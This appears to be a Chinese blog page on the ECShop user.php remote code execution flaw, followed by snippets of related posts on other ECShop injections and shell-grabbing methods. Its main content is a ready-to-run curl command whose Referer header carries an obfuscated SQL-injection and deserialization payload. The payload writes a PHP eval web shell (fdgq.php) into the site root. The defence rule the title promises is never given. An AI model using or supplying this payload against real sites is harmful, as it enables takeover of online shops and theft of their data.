ecshop漏洞user.php,ECSHOP 漏洞重放及屏蔽规则

最新推荐文章于 2023-05-04 10:30:43 发布
最新推荐文章于 2023-05-04 10:30:43 发布
阅读量411 收藏
点赞数
文章标签: ecshop漏洞user.php

ECSHOP 的user.php文件存在文件上传漏洞

测试:域名改为自己的哟!

curl -sI "http://www.xxxxxx.com/user.php?act=login" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) huaxiaspider/1.0 (https://www.xxxx.cn/spider.html)" --referer "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:288:\"*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275D3B617373657274286261736536345F6465636F646528275A6D6C735A56397764585266593239756447567564484D6F4A325A6B5A334575634768774A79776E50443977614841675A585A686243676B583142505531526262475678645630704F79412F506963702729293B2F2F7D787878,10-- -\";s:2:\"id\";s:3:\"'/*\";}"

此时网站根目录下会出现一个fdgq.php文件

如果您使用的是IIS作为网站的web引擎,安装了URL重写模块之后,可以添加规则进行防御

皮小只
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ecshop常见漏洞
10-30
ecshop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库;跨站攻击; ECSHOP的配送地址页面网页没有验证地区参数的有效性,存在sql注入漏洞ecshop的后台编辑文件/admin/affiliate_ck.php中,对输入参数auid未进行正确类型转义,导致整型注入的发生;ecshop的后台编辑文件/admin/shophelp.php中 shopinfo.php ,对输入参数$_POST['id']未进行正确类型转义,导致整型注入的发生;ecshop的/admin/comment_manage.php中,对输入参数sort_by、sort_order未进行严格过滤,导致SQL注入;ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库; ECSHOP支付插件存在SQL注入漏洞,此漏洞存在于/includes/modules/payment/alipay.php文件中,该文件是ECshop的支付宝插件。由于ECShop使用了str_replace函数做字符串替换,黑客可绕过单引号限制构造SQL注入语句。只要开启支付宝支付插件就能利用该漏洞获取网站数据,且不需要注册登入;ecshop的/includes/lib_insert.php文件中,对输入参数未进行正确类型转义,导致整型注入的发生。
Web漏洞-SQL注入:ECShopuser.php文件中的display函数的模版变量可控,导致注入远程代码执行高危漏洞
奋斗的蜗牛
01-02 1338
ecshop项目,最近服务器上的文件user.php莫名其妙的丢失,或者被篡改,找了一大圈原因,web文件杀毒后,提醒有高危漏洞 网上找到原因,漏洞影响 ECShop全系列版本(包括2.x、3.0.x、3.6.x)均存在该远程代码执行漏洞。阿里云态势感知数据研究中心监控的数据显示,该漏洞利用难度低,影响面广,并已经发现有批量入侵迹象,需要存在相关业务的用户及时关注并进行修补。 专家建议 ...
ecshop漏洞user.php,ECShop 2.x 3.0代码执行漏洞分析
weixin_31240035的博客
03-23 673
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。0x00 前言ECShop是一款B2C独立网店系统,适合企业及个人快速构建个性化网上商店。2.x版本跟3.0版本存在代码执行漏洞。0x01 漏洞原理ECShop 没有对 $GLOBAL[‘_SERVER’][‘HTTP_REFERER’] 变量进行验证,导致用户可以将任意代码插入的u...
ecshop漏洞user.php,ECShop 2.7.2 最新任意用户登陆漏洞
weixin_26804345的博客
03-23 320
由于最近项目需要, 查看了下商派最新发布的ecshop 2.7.2正式版的源代码, 没想到在看到第二个文件时就发现了一处比较明显, 且低级漏洞。这个漏洞可以让任何人以任何用户身份登录到ECShop前台!漏洞的影响ECShop 2.7.2ECShop 2.7.1 不受影响漏洞的出现漏洞出现在/include/init.php文件的512行左右, 代码如下:ecshop 2.7.2 最新任意用户登录漏...
ecshop user.php怎么注入,ECSHOP 常见注入漏洞分析和修复方法
weixin_26706567的博客
03-11 508
优易软件为大家整理 一些ecshop 常见注入漏洞分析和修复方法,在对ecshop使用操作上能够得到一些便利。1.测试版本v2.7.3 RELEASE 20121106(最新)v2.7.3 RELEASE 201204112.漏洞条件需登录到后台3.漏洞利用1) 登陆到台后,选择模板管理,语言项编辑,搜索“用户信息”为什么要搜索“用户信息”,还可以搜索其它的吗?答案是搜索languages\zh_...
360提示[严]Ecshop会员中心XSS漏洞修复.txt
02-02
360提示[严]Ecshop会员中心XSS漏洞修复.txt 360提示[严]Ecshop会员中心XSS漏洞修复.txt 360提示[严]Ecshop会员中心XSS漏洞修复.txt
ECshop修改教程.doc
05-14
ECshop 修改教程 ...7. 安装 Discuz,访问 http://68ecshop.com/ 本教程指导用户如何修改 ECshop 实现特定的功能,包括首页精品、新品、热销展示、去版权与标志、后台部分设置和 ECshop 整合论坛等。
基于PHP的怎样使用支付宝账户登录ecshop插件源码.zip
最新发布
01-16
基于PHP的怎样使用支付宝账户登录ecshop插件源码.zip 基于PHP的怎样使用支付宝账户登录ecshop插件源码.zip 基于PHP的怎样使用支付宝账户登录ecshop插件源码.zip 基于PHP的怎样使用支付宝账户登录ecshop插件源码.zip ...
ecshop兼容高版本PHP.rar
09-11
完美解决ecshopphp5.3以上版本中报错,支持php5.3 5.4 5.5 php5.6版本,个人亲测,不用安装低版本php也能流畅运行ecshop
ECSHOP漏洞
热门推荐
xysoul的专栏
03-20 1万+
ECSHOP漏洞集:http://sebug.net/appdir/ECSHOP ecshop后台拿shell 个人总结七种方法 最近想弄个ecshop做销售。装好ecshop V2.7.2版本之后,测试后台拿shell。 本人整理给自己看的,大家飘过就好。BY:黑猫 ecshop后台拿shell 个人总结七种方法 一、 系统==>数据库管理==>sql查询(可爆出
category.php漏洞,ECShop V2.7.2 category.php SQL Injection Vulnerability
weixin_42151599的博客
04-01 178
### 漏洞代码分析/category.php```..$filter_attr_str = isset($_REQUEST['filter_attr']) ? trim($_REQUEST['filter_attr']) : '0';//变量 $filter_attr_str 是以“.” 分开的数组$filter_attr = empty($filter_attr_str) ? '' : exp...
ECShop 2.7.2 最新任意用户登陆漏洞
hypocode的专栏
05-05 350
本文转载自 http://www.risecq.com/ecshop-2-7-2-%E6%9C%80%E6%96%B0%E6%BC%8F%E6%B4%9E 由于最近项目需要, 查看了下商派最新发布的ECShop 2.7.2正式版的源代码, 没想到在看到第二个文件时就发现了一处比较明显, 且低级漏洞。这个漏洞可以让任何人以任何用户身份登录到ECShop前台
ECShop 2.7.2 最新任意用户登陆漏洞0day
11-25 2290
ECShop 2.7.2 最新任意用户登陆漏洞0day (2015-04-02 16:07:28) 转载▼     由于最近项目需要, 查看了下商派最新发布的ECShop 2.7.2正式版的源代码, 没想到在看到第二个文件时就发现了一处比较明显,且低级漏洞。这个漏洞可以让任何人以任何用户身份登录到ECShop前台!  漏洞的影响  ECShop 2
ecshop 漏洞集合
12-01 2966
ECSHOP漏洞汇总-漏洞修改记录 更新时间:2017-03-23 点击量:1228 以下为网络内容转载,仅供技术研究。 1. 漏洞名称: ecshop注入漏洞修复 补丁编号: 2862905 补丁文件: /api/client/includes/lib_api.php 补丁来源: 云盾自研 更新时间: 漏洞描述: ecshop存在一个盲注漏洞,问题存在于/api/client/
ECSHOP网站程序可以绕过权限上传一句话木马
11-25 1193
ECSHOP网站程序可以绕过权限上传一句话木马 来源:本站转载 作者:heaven@乌云 时间:2013-05-13TAG: 我要投稿  简要描述:   可以绕过权限上传一句话木马   详细说明:   前台留个言,内容是我们的一句话木马: 接着在后台系统==>数据库管理==>数据备份==>选择自定义备份,选择ecs_feedback这张表(存留言的
ECSHOP 2.7.2二次注入分析
From2006To2011的博客
06-02 202
这是一个很老的漏洞了。最近学习代码审计在乌云上看到的,作者只给了部分分析,和利用的exp。 0x1代码分析 漏洞出现在flow.php 在flow.php的372行有如下代码 { /* * 保存收货人信息 */ $consignee = array( 'address_id'...
Ecshop漏洞及修复
欣馨密语
05-11 1294
ECShop存在一个盲注漏洞,问题存在于/api/client/api.php文件中,提交特制的恶意POST请求可进行SQL注入攻击,可获得敏感信息或操作数据库。 路径:/api/client/includes/lib_api.php 参照以下修改: function API_UserLogin($post) { /* SQL注入过滤 */ if (get_magic_...
ecshop SQL注入通杀漏洞以及后台拿SHELL
11-25 8417
ecshop SQL注入通杀漏洞以及后台拿SHELL 文章来源:小灰博客|时间:2013-12-10 16:09:59|作者:Leo |2 条评论 文章分类:安全技术    标签: 安全教程 发现本地有家商城太自大了,真是目中无人啊…果断拿下给个警告,下面记载下这个Ecshop通杀漏洞吧! 先用下面的代码看下表的前缀(运气好下面的代码就把账号密码注射出来了) search.ph
ecshop全系列SQL注入漏洞分析
d59hao的博客
05-04 250
referer值未加判断直接引用,可被攻击者控制输入利用_echash = “554fcae493e564ee0dc75bdf2ebf94ca” 为定值进行切分,构造payload利用反序列化漏洞,构造payload,传输恶意代码insert_ads函数的SQL拼接不规范导致存在SQL注入make_val函数拼接字符串输入,_eval中调用用户输入通过eval最终导致任意命令执行。
ecshop前台漏洞
09-02
具体来说,在ECShop 4.0.7版本中,漏洞入口点位于user.php文件的第1146行。 在这个漏洞链中,display函数起着要的作用。在之前的严漏洞中,display函数也扮演了要角色。在这次漏洞中,通过读取模板注入后的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值